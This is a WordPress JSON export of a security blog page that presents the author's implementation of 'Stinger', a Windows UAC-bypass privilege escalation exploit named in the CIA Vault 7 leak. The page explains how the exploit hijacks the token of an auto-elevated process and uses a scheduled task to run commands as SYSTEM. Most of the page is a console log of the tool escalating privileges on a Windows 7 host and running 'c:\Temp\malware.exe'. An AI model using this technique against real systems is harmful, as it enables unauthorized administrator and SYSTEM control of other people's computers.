{"id":5,"date":"2024-06-11T06:33:24","date_gmt":"2024-06-11T06:33:24","guid":{"rendered":"https:\/\/cmd-right.com\/?page_id=5"},"modified":"2024-06-11T10:14:09","modified_gmt":"2024-06-11T10:14:09","slug":"cia-hacking-tool","status":"publish","type":"page","link":"https:\/\/cmd-right.com\/index.php\/cia-hacking-tool\/","title":{"rendered":"CIA Hacking Tool"},"content":{"rendered":"\n<p class=\"has-text-color has-link-color wp-elements-175f19bf87d3d24ef4b9ac841abbe48e\" style=\"color:#0d48f8\">     <a href=\"https:\/\/cmd-right.com\/index.php\/cia-how-to-archive\/\" target=\"_blank\" rel=\"noopener\" title=\"\">CIA &#8211; &#8220;How To&#8221; Archive<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading has-background has-body-font-family has-medium-font-size\" style=\"background-color:#ececec\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-button-hover-color-color\">Stinger<\/mark><\/strong><\/h1>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-thumbnail has-custom-border\"><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" data-id=\"7\" src=\"https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-150x150.png\" alt=\"cia logo\" class=\"wp-image-7\" style=\"border-width:18px;border-radius:100px\" srcset=\"https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-150x150.png 150w, https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-300x300.png 300w, https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0);color:#504d4d\" class=\"has-inline-color\"><strong>User SID: S-1-5-21-3089230831-4110903467-601958294-1001<\/strong><\/mark><\/p>\n\n\n\n<p><strong>REFERENCES:<\/strong><\/p>\n\n\n\n<ul style=\"color:#0d48f8\" class=\"has-text-color 
has-link-color wp-elements-2055d0f9af826b5850dc476f34a206fb\">\n<li>[0]:\u00a0<a href=\"https:\/\/wikileaks.org\/ciav7p1\/cms\/page_20251107.html\" target=\"_blank\" rel=\"noopener\" title=\"\">Fine Dining Tool Module List, Vault 7, Wikileaks<\/a>.<\/li>\n\n\n\n<li>[1]:\u00a0Reading your way around UAC, James Forshaw.<\/li>\n<\/ul>\n\n\n\n<p>The CIA Vault7 leak describes Stinger[0] as a Privilege Escalation module in the &#8220;Fine Dining&#8221; toolset. Stinger is a &#8220;UAC bypass that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator&#8221;. This is an implementation of Stinger, including debugging routines and additional tradecraft for&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>&nbsp;rights. The exploit works on Windows 7 through Windows 10: it runs privileged code by hijacking the token of an auto-elevated process (e.g.&nbsp;<code>Taskmgr.exe<\/code>) from a UAC-restricted process. The technique of stealing a privileged token and elevating a thread also works on Windows 11; however, it cannot be used there with CreateProcessWithLogonW, which detects the&nbsp;<code>BAD IMPERSONATION<\/code>, nor with CreateFile, the registry, process creation, COM ITask*, named pipes and so on, as those operations fail with&nbsp;<code>ACCESS_DENIED<\/code>&nbsp;or&nbsp;<code>E_BAD_IMPERSONATION<\/code>. This exploit closely resembles UAC Magic[1]; based on the description and the period in which it was used within the CIA for modular malware in &#8220;Fine Dining&#8221;, Stinger is believed to be an implementation of UAC Magic. This is a token-hijacking attack that bypasses UAC on Windows 7 -&gt; Windows 10 and, on Windows 11, yields only an elevated thread to further experiment with. 
This exploit leverages a COM object ITaskService from the privileged thread to run commands under&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>.<\/p>\n\n\n\n<p>Here is an example of the UAC bypass being used on a vulnerable Windows 7 host.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><mark style=\"background-color:rgba(0, 0, 0, 0);color:#504d4d\" class=\"has-inline-color\">Microsoft Windows &#91;Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Users\\TestUser\\Downloads>whoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State\n============================= ==================================== ========\nSeShutdownPrivilege           Shut down the system                 Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled\nSeUndockPrivilege             Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Disabled\nSeTimeZonePrivilege           Change the time zone                 Disabled\n\nC:\\Users\\TestUser\\Downloads>Stinger.exe taskmgr.exe cmd.exe \/c c:\\\\Temp\\\\malware.exe\nShow our process security context...\nUser: TestUser\nDomain: TESTPC\nUser SID: S-1-5-21-3089230831-4110903467-601958294-1001\nChecking token DACL...\nAllowed ACE: GENERIC_ALL\nAccount: TESTPC\\TestUser\nSID: S-1-5-21-3089230831-4110903467-601958294-1001\nAllowed ACE: GENERIC_ALL\nAccount: NT AUTHORITY\\SYSTEM\nSID: S-1-5-18\nAllowed ACE: GENERIC_READ GENERIC_EXECUTE\nLookupAccountSid failed: 1332\nSID: S-1-5-5-0-107317\nToken is not elevated.\nToken is not restricted\nDumping token privileges...\n&#91;-] Disabled Privilege: SeShutdownPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;-] Disabled Privilege: SeUndockPrivilege Attributes : 0\n&#91;-] Disabled Privilege: 
SeIncreaseWorkingSetPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeTimeZonePrivilege Attributes : 0\nProcess ID: 3992\nSuccessfully duplicated token\nH4x0r1nG the token ...\nEnabling privilege: SeIncreaseQuotaPrivilege\nEnabling privilege: SeSecurityPrivilege\nEnabling privilege: SeTakeOwnershipPrivilege\nEnabling privilege: SeLoadDriverPrivilege\nEnabling privilege: SeSystemProfilePrivilege\nEnabling privilege: SeSystemtimePrivilege\nEnabling privilege: SeProfileSingleProcessPrivilege\nEnabling privilege: SeIncreaseBasePriorityPrivilege\nEnabling privilege: SeCreatePagefilePrivilege\nEnabling privilege: SeBackupPrivilege\nEnabling privilege: SeRestorePrivilege\nEnabling privilege: SeShutdownPrivilege\nEnabling privilege: SeDebugPrivilege\nEnabling privilege: SeSystemEnvironmentPrivilege\nEnabling privilege: SeChangeNotifyPrivilege\nEnabling privilege: SeRemoteShutdownPrivilege\nEnabling privilege: SeUndockPrivilege\nEnabling privilege: SeManageVolumePrivilege\nEnabling privilege: SeImpersonatePrivilege\nEnabling privilege: SeCreateGlobalPrivilege\nEnabling privilege: SeIncreaseWorkingSetPrivilege\nEnabling privilege: SeTimeZonePrivilege\nEnabling privilege: SeCreateSymbolicLinkPrivilege\nDropping IL...\nInitialized medium IL SID\nToken lowered to medium integrity\nCOM init...\nAttemping to bypass UAC with the token...\nImpersonateLoggedOnUser succeeded.. 
\nDumping our new security context..\nUser: TestUser\nDomain: TESTPC\nUser SID: S-1-5-21-3089230831-4110903467-601958294-1001\nChecking token DACL...\nAllowed ACE: GENERIC_ALL\nAccount: BUILTIN\\Administrators\nSID: S-1-5-32-544\nAllowed ACE: GENERIC_ALL\nAccount: NT AUTHORITY\\SYSTEM\nSID: S-1-5-18\nAllowed ACE: GENERIC_READ GENERIC_EXECUTE\nLookupAccountSid failed: 1332\nSID: S-1-5-5-0-107317\nToken is elevated!\nToken is not restricted\nDumping token privileges...\n&#91;+] Enabled Privilege: SeIncreaseQuotaPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeSecurityPrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeTakeOwnershipPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeLoadDriverPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeSystemProfilePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeSystemtimePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeProfileSingleProcessPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeIncreaseBasePriorityPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeCreatePagefilePrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeBackupPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeRestorePrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeShutdownPrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeDebugPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeSystemEnvironmentPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;+] Enabled Privilege: SeRemoteShutdownPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeUndockPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeManageVolumePrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeImpersonatePrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeCreateGlobalPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;+] Enabled Privilege: SeIncreaseWorkingSetPrivilege Attributes : 2\n&#91;+] Enabled Privilege: 
SeTimeZonePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeCreateSymbolicLinkPrivilege Attributes : 2\nAttemping to run command as NT AUTHORITY\\SYSTEM via COM...\nCreated ITaskService..\nConnected to ITaskService..\nRegistering the evil Task..\nTask created successfully.\nExecuted command as NT AUTHORITY\\SYSTEM... wait for cleanup\nTask deleted successfully. \n<\/mark><\/code><\/pre>\n\n\n\n<p>Your commands have executed under&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>. Happy New Year!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CIA &#8211; &#8220;How To&#8221; Archive Stinger User SID: S-1-5-21-3089230831-4110903467-601958294-1001 REFERENCES: CIA Vault7 leak describes Stinger[0] as a Privilege Escalation module in the &#8220;Fine Dining&#8221; toolset. Stinger is a &#8220;UAC bypass that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator&#8221;. This is an implementation of Stinger, including debugging [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5"}],"collection":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/comments?post=5"}],"version-history":[{"count":4,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5\/revisions"}],"predecessor-version":[{"id":47,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5\/revisions\/47"}],"wp:attachment":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/media?parent=5"}],"curies":
[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}